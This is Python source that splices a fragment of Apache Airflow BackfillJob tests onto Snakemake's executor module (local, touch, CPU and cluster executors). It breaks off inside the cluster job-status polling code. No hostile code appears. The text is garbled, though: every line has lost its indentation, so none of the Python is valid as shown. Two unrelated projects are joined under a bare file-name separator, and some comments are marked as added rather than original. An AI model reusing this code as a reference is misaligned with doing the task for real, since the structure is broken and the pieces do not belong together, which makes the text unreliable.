states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
tasks = []
with dag_maker(dag_id=prefix) as dag:
for i in range(len(states)):
task_id = f"{prefix}_task_{i}"
task = DummyOperator(task_id=task_id)
tasks.append(task)
session = settings.Session()
job = BackfillJob(dag=dag)
# create dagruns
dr1 = dag_maker.create_dagrun(state=State.RUNNING)
dr2 = dag.create_dagrun(run_id='test2', state=State.SUCCESS)
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
assert 2 == job.reset_state_for_orphaned_tasks()
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
assert ti.state is None
else:
assert state == ti.state
# otherwise not
for state, ti in zip(states, dr2_tis):
assert state == ti.state
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
assert state == ti.state
def test_reset_orphaned_tasks_specified_dagrun(self, session, dag_maker):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
task_id = dag_id + '_task'
with dag_maker(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily',
session=session,
) as dag:
DummyOperator(task_id=task_id, dag=dag)
job = BackfillJob(dag=dag)
# make two dagruns, only reset for one
dr1 = dag_maker.create_dagrun(state=State.SUCCESS)
dr2 = dag.create_dagrun(run_id='test2', state=State.RUNNING, session=session)
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.flush()
num_reset_tis = job.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
assert 1 == num_reset_tis
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
assert State.SCHEDULED == ti1.state
assert State.NONE == ti2.state
def test_job_id_is_assigned_to_dag_run(self, dag_maker):
dag_id = 'test_job_id_is_assigned_to_dag_run'
with dag_maker(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily') as dag:
DummyOperator(task_id="dummy_task", dag=dag)
job = BackfillJob(
dag=dag, executor=MockExecutor(), start_date=timezone.utcnow() - datetime.timedelta(days=1)
)
job.run()
dr: DagRun = dag.get_last_dagrun()
assert dr.creating_job_id == job.id
def test_backfill_has_job_id(self):
"""Make sure that backfill jobs are assigned job_ids."""
dag = self.dagbag.get_dag("test_start_date_scheduling")
dag.clear()
executor = MockExecutor(parallelism=16)
job = BackfillJob(
executor=executor,
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
run_backwards=True,
)
job.run()
assert executor.job_id is not None
@pytest.mark.long_running
@pytest.mark.parametrize("executor_name", ["SequentialExecutor", "DebugExecutor"])
@pytest.mark.parametrize("dag_id", ["test_mapped_classic", "test_mapped_taskflow"])
def test_mapped_dag(self, dag_id, executor_name):
"""
End-to-end test of a simple mapped dag.
We test with multiple executors as they have different "execution environments" -- for instance
DebugExecutor runs a lot more in the same process than other Executors.
"""
# This test needs a real executor to run, so that the `make_list` task can write out the TaskMap
from airflow.executors.executor_loader import ExecutorLoader
self.dagbag.process_file(str(TEST_DAGS_FOLDER / f'{dag_id}.py'))
dag = self.dagbag.get_dag(dag_id)
job = BackfillJob(
dag=dag,
start_date=days_ago(1),
end_date=days_ago(1),
donot_pickle=True,
executor=ExecutorLoader.load_executor(executor_name),
)
job.run()
# ---- __init__.py ----
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2021, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_resources_args(self):
if self.workflow.overwrite_resources:
return " --set-resources {} ".format(
" ".join(
"{}:{}={}".format(rule, name, value)
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
),
)
return ""
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self, default_resources=None):
if default_resources is None:
default_resources = self.workflow.default_resources
if default_resources:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
This method can be overwritten to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
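    # Minimal sketch (added for clarity, not part of the original module) of
    # how a subclass could override run_jobs to batch submissions while still
    # honoring the per-job callback contract described above. The BatchExecutor
    # name and its _submit_batch helper are hypothetical.
    #
    #     class BatchExecutor(AbstractExecutor):
    #         def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
    #             self._submit_batch(jobs)  # hypothetical bulk submission
    #             for job in jobs:
    #                 # each job still gets its own callback invocations
    #                 submit_callback(job)
    #                 callback(job)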
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.conda_base_path and self.assume_shared_fs:
additional += " --conda-base-path {} ".format(
self.workflow.conda_base_path
)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows "
if self.workflow.max_threads is not None:
additional += " --max-threads {} ".format(self.workflow.max_threads)
additional += self.get_set_resources_args()
additional += self.get_set_scatter_args()
additional += self.get_set_threads_args()
additional += self.get_behavior_args()
if self.workflow.use_env_modules:
additional += " --use-envmodules "
if not self.keepmetadata:
additional += " --drop-metadata "
return additional
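    # Illustrative note (added for clarity, not part of the original module):
    # for a workflow with use_conda enabled and a conda prefix configured, the
    # fragment returned above would include something like
    # " --use-conda  --conda-prefix /path/to/envs " (the path is made up),
    # plus further flags depending on the other workflow settings checked above.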
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = job.conda_env_path if self.workflow.use_conda else None
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook,
self.workflow.conda_base_path,
job.rule.basedir,
)
def run_single_job(self, job):
if self.use_threads or (not job.is_shadow and not job.is_run):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe group job.
This lets all items run simultaneously."""
# we only have to consider pipe groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
while True:
k = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
k += 1
if k == len(futures):
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
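    # Rough sketch (added for clarity, not part of the original module) of what
    # ends up in a generated jobscript: the exec_job template assembled in
    # __init__ below expands, per job, to something along the lines of
    #
    #     cd <workdir> && python -m snakemake <target> --snakefile <snakefile> \
    #         --force --cores <cores> --keep-target-files --keep-remote \
    #         --wait-for-files <files> --latency-wait <seconds> ... --mode cluster
    #
    # which the jobscript then runs on the cluster node; the angle-bracket
    # values are placeholders filled in by format_job/format_job_pattern.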
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force --cores {cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"{waitfiles_parameter:u} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock {scheduler_solver_path:u} ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else "all"
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_thread)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def _wait_thread(self):
try:
self._wait_for_jobs()
except Exception as e:
self.workflow.scheduler.executor_error_callback(e)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
scheduler_solver_path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Prepend PATH of current python executable to PATH.
# This way, we ensure that the snakemake process in the cluster node runs
# in the same environment as the current process.
# This is necessary in order to find the pulp solver backends (e.g. coincbc).
scheduler_solver_path = "--scheduler-solver-path {}".format(
os.path.dirname(sys.executable)
)
# Only create extra file if we have more than 20 input files.
# This should not require the file creation in most cases.
if len(wait_for_files) > 20:
wait_for_files_file = self.get_jobscript(job) + ".waitforfilesfile.txt"
with open(wait_for_files_file, "w") as fd:
fd.write("\n".join(wait_for_files))
waitfiles_parameter = format(
"--wait-for-files-file {wait_for_files_file}",
wait_for_files_file=wait_for_files_file,
)
else:
waitfiles_parameter = format(
"--wait-for-files {wait_for_files}", wait_for_files=wait_for_files
)
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
waitfiles_parameter=waitfiles_parameter,
scheduler_solver_path=scheduler_solver_path,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.external_jobid = dict()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
status_cmd_kills = set()
if self.statuscmd is not None:
def job_status(job, valid_returns=["running", "success", "failed"]):
try:
# this command shall return "success", "failed" or "running"
ret = subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
).decode()
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
status_cmd_kills.add(e.returncode)
if len(status_cmd_kills) > 10:
logger.info(
"Cluster status command {} was killed >10 times with signal(s) {} "
"(if this happens unexpectedly during your workflow execution, "
"have a closer look.).".format(
self.statuscmd, ",".join(status_cmd_kills)
)
)
status_cmd_kills.clear()
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
ret = ret.strip().split("\n")
if len(ret) != 1 or ret[0] not in valid_returns:
raise WorkflowError(
"Cluster status command {} returned {} but just a single line with one of {} is expected.".format(
self.statuscmd, "\\n".join(ret), ",".join(valid_returns)
)
)
return ret[0]
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
